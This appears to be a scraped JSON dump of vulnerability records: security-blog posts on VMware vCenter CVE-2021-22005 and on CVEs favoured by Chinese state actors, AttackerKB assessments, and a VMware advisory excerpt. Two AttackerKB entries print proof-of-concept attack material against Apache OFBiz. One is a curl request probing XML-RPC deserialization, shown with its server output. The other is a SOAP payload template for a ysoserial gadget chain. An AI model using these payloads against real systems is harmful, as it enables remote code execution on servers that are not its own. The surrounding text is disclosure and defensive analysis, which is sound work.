coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, 
everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter Server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvCenter Server is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. 
With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 allows. It's a file upload vulnerability and anyone with access to vCenter Server over a network can exploit it. The configuration settings of vCenter Server don't make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vCenter Server.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patching immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). VMware acknowledges that an emergency patch may fall outside how you usually do things, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vCenter setup affected by this?\n\nIt depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. 
We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security 
Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need to be patched within two weeks on federal information systems. 
The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vulnerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), 
[CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. 
[CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * Apply patches as they come, prioritizing the most critical flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:33:30", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). 
CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T14:37:37", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s 
assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-06-05T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T14:39:40", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. 
A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": 
"2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T17:09:20", "description": "XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03\n\n \n**Recent assessments:** \n \n**wvu-r7** at August 13, 2020 8:00pm UTC reported:\n\nPre-auth RCE in [ERP](<https://en.wikipedia.org/wiki/Enterprise_resource_planning>) software that\u2019s free and isn\u2019t SAP? Sweet. And it\u2019s a long-standing Apache project that\u2019s often recommended. Here\u2019s a PoC:\n \n \n wvu@kharak:~$ curl -vH \"Content-Type: text/xml\" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version=\"1.0\"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"></serializable></value></member></struct></value></param></params></methodCall>'\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\n > POST /webtools/control/xmlrpc HTTP/1.1\n > Host: 127.0.0.1:8080\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: text/xml\n > Content-Length: 273\n >\n * upload completely sent off: 273 out of 273 bytes\n < HTTP/1.1 200 OK\n < Server: Apache-Coyote/1.1\n < Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly\n < Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/\n < Content-Type: text/xml;charset=UTF-8\n < Transfer-Encoding: chunked\n < Vary: Accept-Encoding\n < Date: Thu, 13 Aug 2020 19:57:20 GMT\n <\n * Connection #0 to host 127.0.0.1 left intact\n <?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse 
xmlns:ex=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0\n wvu@kharak:~$\n \n\nA lot of orgs rely on ERP software, and you\u2019re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I\u2019d say.\n\nNote that the [CVE](<https://nvd.nist.gov/vuln/detail/CVE-2020-9496>) seems to conflate this with XSS. CVSS score seems lower than I\u2019d expect.\n\nETA: Here\u2019s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000>.\n\n**pbarry-r7** at August 24, 2020 3:13am UTC reported:\n\nPre-auth RCE in [ERP](<https://en.wikipedia.org/wiki/Enterprise_resource_planning>) software that\u2019s free and isn\u2019t SAP? Sweet. And it\u2019s a long-standing Apache project that\u2019s often recommended. 
Here\u2019s a PoC:\n \n \n wvu@kharak:~$ curl -vH \"Content-Type: text/xml\" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version=\"1.0\"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"></serializable></value></member></struct></value></param></params></methodCall>'\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\n > POST /webtools/control/xmlrpc HTTP/1.1\n > Host: 127.0.0.1:8080\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: text/xml\n > Content-Length: 273\n >\n * upload completely sent off: 273 out of 273 bytes\n < HTTP/1.1 200 OK\n < Server: Apache-Coyote/1.1\n < Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly\n < Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/\n < Content-Type: text/xml;charset=UTF-8\n < Transfer-Encoding: chunked\n < Vary: Accept-Encoding\n < Date: Thu, 13 Aug 2020 19:57:20 GMT\n <\n * Connection #0 to host 127.0.0.1 left intact\n <?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse xmlns:ex=\"http://ws.apache.org/xmlrpc/namespaces/extensions\"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0\n wvu@kharak:~$\n \n\nA lot of orgs rely on ERP software, and you\u2019re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I\u2019d say.\n\nNote that the [CVE](<https://nvd.nist.gov/vuln/detail/CVE-2020-9496>) seems to conflate this with XSS. 
CVSS score seems lower than I\u2019d expect.\n\nETA: Here\u2019s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000>.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-9496", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9496", "CVE-2021-26295", "CVE-2021-29200"], "modified": "2020-08-28T00:00:00", "id": "AKB:274E3983-7823-4CD0-B47C-0EBC25DD5646", "href": "https://attackerkb.com/topics/0T2QSZYDuD/cve-2020-9496", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-11T22:45:04", "description": "Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 31, 2021 1:24pm UTC reported:\n\nThis vulnerability is pretty straightforward to exploit. 
It is due to an unauthenticated SOAP interface in the Apache OFBiz application that accepts and deserializes an arbitrary Java object. This can be leveraged by an attacker to submit a payload to the server that after being deserialized will result in a command being executed. The [YSoSerial](<https://github.com/frohoff/ysoserial>) `ROME` gadget chain can be used for this purpose.\n\nThe serialized object is encoded in hex and placed within the `cus-obj` XML node of the SOAP request:\n \n \n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header/>\n <soapenv:Body>\n <ser>\n <map-HashMap>\n <map-Entry>\n <map-Key>\n <cus-obj>$hexGadgetChain</cus-obj>\n </map-Key>\n <map-Value>\n <std-String value=\"http://example.com\"/>\n </map-Value>\n </map-Entry>\n </map-HashMap>\n </ser>\n </soapenv:Body>\n </soapenv:Envelope>\n \n\nThis was taken from a [PoC](<https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py>) which was credited in the Metasploit exploit module.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-26295", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2170", "CVE-2021-26295", "CVE-2021-29200", "CVE-2021-30128", "CVE-2021-37608"], "modified": "2021-03-26T00:00:00", "id": "AKB:9A355845-4C8F-48C3-9829-4A54539E1FB8", "href": "https://attackerkb.com/topics/gPRJEi19sG/cve-2021-26295", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2021-09-03T02:07:16", "description": "##### **1\\. Impacted Products**\n\n * VMware vRealize Operations \n\n * VMware Cloud Foundation \n\n * vRealize Suite Lifecycle Manager \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vRealize Operations were privately reported to VMware. Patches and Workarounds are available to address these vulnerabilities in impacted VMware products. \n\n\n##### **3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)**\n\n**Description**\n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [8.6](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21975 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to impacted deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21975 have been listed in the 'Workarounds' column of the 'Response Matrix' below. 
